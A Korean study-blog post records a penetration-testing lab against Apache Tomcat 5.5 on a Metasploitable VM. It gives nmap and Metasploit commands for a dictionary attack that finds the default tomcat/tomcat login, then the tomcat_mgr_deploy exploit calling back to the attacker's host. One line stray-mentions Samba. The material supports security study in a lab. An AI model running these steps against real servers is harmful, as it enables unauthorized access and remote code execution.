Study Record

[모의해킹 실습] Tomcat 취약점 본문

모의해킹

[모의해킹 실습] Tomcat 취약점

초코초코초코 2021. 11. 10. 22:58
728x90

1. 개요

Tomcat 버전 5.x 에서기본 페이지를 사용할 경우 생기는 취약점을 알아본다.

- (msfconsole) auxiliary/scanner/http/tomcat_mgr_login

- (msfconsole) use exploit/multi/http/tomcat_mgr_deploy

 

2. 공격 실습

공격자(KaliLiux) : 192.168.10.50

공격 대상(metasploitable) : 192.168.10.141

 

[KaliLinux]

공격대상 시스템에 스캐닝을 시도하여 취약한 samba 서비스를 사용하고 있는 것을 확인한다.

# nmap -sV -O 192.168.10.141

Apache Tomcat 를 사용하고 있는 사이트에 접속한다.

# firefox http://192.168.10.141:8180 &

Apache Tomcat/5.5 버전이 설치되어 있고 기본 페이지로 되어있다.

Tomcat Manager 를 누르고 이 창을 유지한다.

 

Tomcat 홈페이지의 관리자 페이지를 가지고 Dictionary Attack 을 수행한다.

# msfconsole -q

msf6> search apache tomcat

msf6> use auxiliary/scanner/http/tomcat_mgr_login

msf6> set STOP_ON_SUCCESS true

msf6> set RHOSTS 192.168.10.141

msf6> set RPORT 8180

msf6> run

실행한 결과 ID “tomcat” 이고 password“tomcat” 이라는 사실을 알 수 있다.

 

Tomcat 홈페이지의 관리자 페이지에 tomcat/tomcat으로 로그인한다.

관리자 페이지에 파일을 업로드할 수 있는 상태가 됐다.

 

관리자 페이지에 파일 업로드 공격을 시도한다.

msf6> search apache tomcat

msf6> use exploit/multi/http/tomcat_mgr_deploy

msf6> set HttpPassword tomcat

msf6> set HttpUsername tomcat

msf6> set RHOSTS 192.168.10.141

msf6> set RPORT 8180

msf6> set LHOST 192.168.10.50

msf6> run

 

728x90